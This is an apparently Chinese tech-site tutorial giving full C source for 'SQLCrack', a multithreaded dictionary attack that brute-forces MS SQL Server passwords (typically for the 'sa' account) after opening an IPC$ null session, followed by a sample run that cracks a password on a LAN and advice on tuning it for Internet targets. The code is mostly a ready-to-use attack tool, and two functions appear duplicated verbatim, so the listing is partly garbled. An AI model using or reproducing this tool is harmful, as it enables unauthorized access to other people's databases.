【IT168 服务器学院】此程序只作技术交流之用,如用于不法用途,作者不负任何责任!!
这篇文章的重点是如何探测MS SQL SERVER账号的密码,下面以一个实例来说明探测密码的全过程。
//程序所用到的头文件
//定义全局变量
char dict[20000][40],//准备探测的密码
UserName[40],//用户名
target[40],//目标服务器
passwd[40];//已经探测出来的正确密码
int total=0;//字典里面单词数量
BOOL Cracked=FALSE;//探测密码成功时此值为TRUE
//
//函数:usage
//功能:显示程序帮助信息
//
void usage()
{
printf("\nPower by analyzer〈inmiao@163.com〉"
"\nhttp://www.infocn.com"
"\nUsage:SQLCrack 〈ip〉 〈UserName〉 〈dict〉 〈SleepTime[20-1000]〉"
"\nExample:SQLCrack 192.168.0.1 sa c:\\pwd.dic 50\n");
return;
}
//
//函数:ReadDic
//功能:从字典文件里面读取数据,传递给全局变量dict,准备探测密码
//说明:函数运行失败返回值1,成功返回0
//
int ReadDic(char *dic)
{
FILE *fp;
char tmp[40];
//打开字典文件
if((fp=fopen(dic,"r"))==NULL)
{
printf("\nCan''t open %s",dic);
return 1;
}
while(!feof(fp))
{
//读取数据到临时变量
if(fgets(tmp,40,fp)==NULL)
break;
//这里别忘了把从文件里面读出来的最后一位数据[换行符号]去掉,不然就探测不出来密码了
strncpy(dict[total],tmp,strlen(tmp)-1);
total++;
//因为dict定义为dict[20000][40],所以这里如果字典里面的单词超出20000就退出循环
//不然就会溢出啦.可以自行调准
if(total〉=20000)
break;
}
fclose(fp);
return 0;
}
//
//函数:ConnIPC
//功能:建立IPC连接
//说明:连接失败返回值1,成功返回值0
//
int ConnIPC(char *RemoteName)
{
NETRESOURCE nr;
DWORD flags=CONNECT_UPDATE_PROFILE;
TCHAR RN[30]="\\\\",
LN[5]="";
strcat(RN,RemoteName);
strcat(RN,"\\ipc$");
//填充数据结构
nr.dwType=RESOURCETYPE_DISK;
nr.lpLocalName=(LPTSTR)&LN;
nr.lpRemoteName=(LPTSTR)&RN;
nr.lpProvider=NULL;
if(WNetAddConnection2(&nr,(LPSTR)"",(LPSTR)"",flags)==NO_ERROR)
{
return 0;
}
else
{
return 1;
}
}
//
//函数:DelIPC
//功能:断开IPC Session
//说明:成功返回值0,否则返回1
//
int DelIPC(char *RemoteName)
{
DWORD ret;
TCHAR lpName[30]="\\\\";
strcat(lpName,RemoteName);
strcat(lpName,"\\ipc$");
ret=WNetCancelConnection2(lpName,CONNECT_UPDATE_PROFILE,TRUE);
if(ret==NO_ERROR)
{
return 0;
}
else
{
return 1;
}
}
//
//函数SQLCheck
//功能:尝试用不同密码连接SQL Server,探测出正确的密码
//
DWORD WINAPI SQLCheck(PVOID pPwd)
{
//定义局部变量
char szBuffer[1025];
char *pwd;
SWORD swStrLen;
SQLHDBC hdbc;
SQLHANDLE henv;
SQLRETURN retcode;//ODBC API运行返回值
SCHAR ConnStr[200];//连接数据库字符串
//取得传递过来准备探测的密码
pwd=(char *)pPwd;
//构造连接数据库字符
strcpy(ConnStr,"DRIVER={SQL Server};SERVER=");
strcat(ConnStr,target);
strcat(ConnStr,";UID=");
strcat(ConnStr,UserName);
strcat(ConnStr,";PWD=");
strcat(ConnStr,pwd);
strcat(ConnStr,";DATABASE=master");
//puts(ConnStr);
//创建数据库应用的环境句柄
if (SQLAllocHandle(SQL_HANDLE_ENV,SQL_NULL_HANDLE,&henv) !=SQL_SUCCESS)
{
printf("\nAllocate environment handle failed.\n");
return 0;
}
//printf("henv..");
//设置ODBC版本环境
if (SQLSetEnvAttr(henv, SQL_ATTR_ODBC_VERSION,(SQLPOINTER)
SQL_OV_ODBC3, SQL_IS_INTEGER) != SQL_SUCCESS)
{
printf("\nSet the ODBC version environment attribute failed.\n");
SQLFreeHandle(SQL_HANDLE_ENV, henv);
return 0;
}
//printf("ODBC ver..");
//创建连接句柄
if ((retcode= SQLAllocHandle(SQL_HANDLE_DBC,henv,(SQLHDBC FAR
*)&hdbc)) != SQL_SUCCESS)
{
printf("\nAllocate connection handle failed.\n");
SQLFreeHandle(SQL_HANDLE_ENV, henv);
return 0;
}
//printf("hdbc..");
//连接数据源
retcode= SQLDriverConnect(hdbc,NULL,ConnStr,strlen(ConnStr),
szBuffer,sizeof(szBuffer),&swStrLen,
SQL_DRIVER_COMPLETE_REQUIRED);
//printf("conn..");
if(retcode!=SQL_SUCCESS && retcode != SQL_SUCCESS_WITH_INFO)
{
//连接失败,函数终止
//printf("\nCouldn''t connect to %s MSSQL server.\n",target);
SQLFreeHandle(SQL_HANDLE_DBC, hdbc);
SQLFreeHandle(SQL_HANDLE_ENV, henv);
return 0;
}
//连接远程MSSQL Server数据库成功
Cracked=TRUE;
strcpy(passwd,pwd);
//puts(szBuffer);
//显示连接远程数据库的字符串
//断开连接
SQLDisconnect(hdbc);
//printf("disconn..");
//释放连接句柄
SQLFreeHandle(SQL_HANDLE_DBC, hdbc);
//printf("free hdbc..");
//释放环境句柄
SQLFreeHandle(SQL_HANDLE_ENV, henv);
//printf("free henv..\n");
return 0;
}
//
//函数:DelIPC
//功能:断开IPC Session
//说明:成功返回值0,否则返回1
//
int DelIPC(char *RemoteName)
{
DWORD ret;
TCHAR lpName[30]="\\\\";
strcat(lpName,RemoteName);
strcat(lpName,"\\ipc$");
ret=WNetCancelConnection2(lpName,CONNECT_UPDATE_PROFILE,TRUE);
if(ret==NO_ERROR)
{
return 0;
}
else
{
return 1;
}
}
//
//函数SQLCheck
//功能:尝试用不同密码连接SQL Server,探测出正确的密码
//
DWORD WINAPI SQLCheck(PVOID pPwd)
{
//定义局部变量
char szBuffer[1025];
char *pwd;
SWORD swStrLen;
SQLHDBC hdbc;
SQLHANDLE henv;
SQLRETURN retcode;//ODBC API运行返回值
SCHAR ConnStr[200];//连接数据库字符串
//取得传递过来准备探测的密码
pwd=(char *)pPwd;
//构造连接数据库字符
strcpy(ConnStr,"DRIVER={SQL Server};SERVER=");
strcat(ConnStr,target);
strcat(ConnStr,";UID=");
strcat(ConnStr,UserName);
strcat(ConnStr,";PWD=");
strcat(ConnStr,pwd);
strcat(ConnStr,";DATABASE=master");
//puts(ConnStr);
//创建数据库应用的环境句柄
if (SQLAllocHandle(SQL_HANDLE_ENV,SQL_NULL_HANDLE,&henv) !=SQL_SUCCESS)
{
printf("\nAllocate environment handle failed.\n");
return 0;
}
//printf("henv..");
//设置ODBC版本环境
if (SQLSetEnvAttr(henv, SQL_ATTR_ODBC_VERSION,(SQLPOINTER)
SQL_OV_ODBC3, SQL_IS_INTEGER) != SQL_SUCCESS)
{
printf("\nSet the ODBC version environment attribute failed.\n");
SQLFreeHandle(SQL_HANDLE_ENV, henv);
return 0;
}
//printf("ODBC ver..");
//创建连接句柄
if ((retcode= SQLAllocHandle(SQL_HANDLE_DBC,henv,(SQLHDBC FAR
*)&hdbc)) != SQL_SUCCESS)
{
printf("\nAllocate connection handle failed.\n");
SQLFreeHandle(SQL_HANDLE_ENV, henv);
return 0;
}
//printf("hdbc..");
//连接数据源
retcode= SQLDriverConnect(hdbc,NULL,ConnStr,strlen(ConnStr),
szBuffer,sizeof(szBuffer),&swStrLen,
SQL_DRIVER_COMPLETE_REQUIRED);
//printf("conn..");
if(retcode!=SQL_SUCCESS && retcode != SQL_SUCCESS_WITH_INFO)
{
//连接失败,函数终止
//printf("\nCouldn''t connect to %s MSSQL server.\n",target);
SQLFreeHandle(SQL_HANDLE_DBC, hdbc);
SQLFreeHandle(SQL_HANDLE_ENV, henv);
return 0;
}
//连接远程MSSQL Server数据库成功
Cracked=TRUE;
strcpy(passwd,pwd);
//puts(szBuffer);
//显示连接远程数据库的字符串
//断开连接
SQLDisconnect(hdbc);
//printf("disconn..");
//释放连接句柄
SQLFreeHandle(SQL_HANDLE_DBC, hdbc);
//printf("free hdbc..");
//释放环境句柄
SQLFreeHandle(SQL_HANDLE_ENV, henv);
//printf("free henv..\n");
return 0;
}
//
//程序入口点函数:main
//
int main(int argc,char **argv)
{
HANDLE hThread;//线程句柄
DWORD dwThreadId;
int i=0,err=0,
SleepTime;//每开一个线程后的挂起时间
clock_t start,end;//程序运行的起始和结束时间
double duration;
//检查用户输入参数,参数不足调用函数usage显示帮助信息并退出程序
if(argc!=5)
{
usage();
return 1;
}
//取得并检查用户输入的挂起时间
SleepTime=atoi(argv[4]);
if((SleepTime〉1000) || (SleepTime〈20))
{
usage();
return 1;
}
//取得目标地址,用户名
strcpy(target,argv[1]);
strcpy(UserName,argv[2]);
//读取字典中的单词到内存中
if(ReadDic(argv[3])!=0)
return 1;
//for(i=0;i〈total;i++)
// printf("[%s]--〉%d",dict[i],strlen(dict[i]));
//与目标机器建立IPC Session
if(ConnIPC(argv[1])!=0)
{
printf("\nCan''t built IPC NULL Session!");
return 1;
}
else
{
printf("\nBuilt IPC NULL Session success!\n");
}
//开始计时
start=clock();
//开始建立线程探测密码
for(i=0;i〈total;i++)
{
//探测密码成功后跳出此循环
if(Cracked==TRUE)
break;
//显示进度信息
printf("\n[%d/%d] %s -〉 %s -〉 %s",i+1,total,target,UserName,dict[i]);
//创建线程
hThread=CreateThread(NULL,0,SQLCheck,(PVOID)&dict[i],0,&dwThreadId);
if(hThread==NULL)
{
err++;
if(err==50)
{
MessageBox(NULL,"thread error","error",MB_OK);
break;
}
}
CloseHandle(hThread);
//每开一个线程挂起一段时间,确保探测结果的正确性和系统的稳定
Sleep(SleepTime);
}
//断开与目标机器的IPC Session
DelIPC(target);
//挂起一段时间,等待所有线程结束
Sleep(1000);
//探测密码成功后回显信息
if(Cracked==TRUE)
printf("\n\nSuccess!%s SQL Server User [%s] passwd is [%s].",target,UserName,passwd);
//记时结束
end=clock();
//转换时间格式
duration = (double)(end - start) / CLOCKS_PER_SEC;
//显示所用时间
printf("\n\nComplete.Use %2.1f seconds.\n",duration);
return 0;
}
以上程序在windows2000,vc++6.0环境下编译通过。以下我在LAN中测试此程序时的一些情况:
c:\〉 SQLCrack.exe
Power by analyzer〈inmiao@163.com〉
http://www.infocn.com
Usage:SQLCrack 〈ip〉 〈UserName〉 〈dict〉 〈SleepTime[20-1000]〉
Example:SQLCrack 192.168.0.1 sa c:\pwd.dic 50
c:\〉 SQLCrack.exe 192.0.0.81 sa c:\password.Dic 20
Built IPC NULL Session success!
[1/1870] 192.0.0.81 -〉 sa -〉 !@#$%
[2/1870] 192.0.0.81 -〉 sa -〉 !@#$%^
[3/1870] 192.0.0.81 -〉 sa -〉 !@#$%^&
[4/1870] 192.0.0.81 -〉 sa -〉 !@#$%^&*
[5/1870] 192.0.0.81 -〉 sa -〉 *
[6/1870] 192.0.0.81 -〉 sa -〉 000000
[7/1870] 192.0.0.81 -〉 sa -〉 00000000
[8/1870] 192.0.0.81 -〉 sa -〉 0007
此处略去输出结果若干……
[1827/1870] 192.0.0.81 -〉 sa -〉 winter
[1828/1870] 192.0.0.81 -〉 sa -〉 wisdom
[1829/1870] 192.0.0.81 -〉 sa -〉 wizard
[1830/1870] 192.0.0.81 -〉 sa -〉 wolf
[1831/1870] 192.0.0.81 -〉 sa -〉 wolf1
[1832/1870] 192.0.0.81 -〉 sa -〉 loveyou
Success!192.0.0.81 SQL Server User [sa] passwd is [loveyou].
Complete.Use 76.1 seconds.
C:\〉
用时一分钟多一点,探测密码1800多次,最终探测成功!另外,因为在LAN中速度比较快,所以我在运行程序时,输入的SleepTime为20,意思是每隔20毫秒开一个线程。在Internet做测试的时候,请根据网速自行调准SleepTime,建议SleepTime设置为200左右,如果SleepTime设置较小,而网速不快的话,容易出现漏报现象,那就探测不出正确的密码了。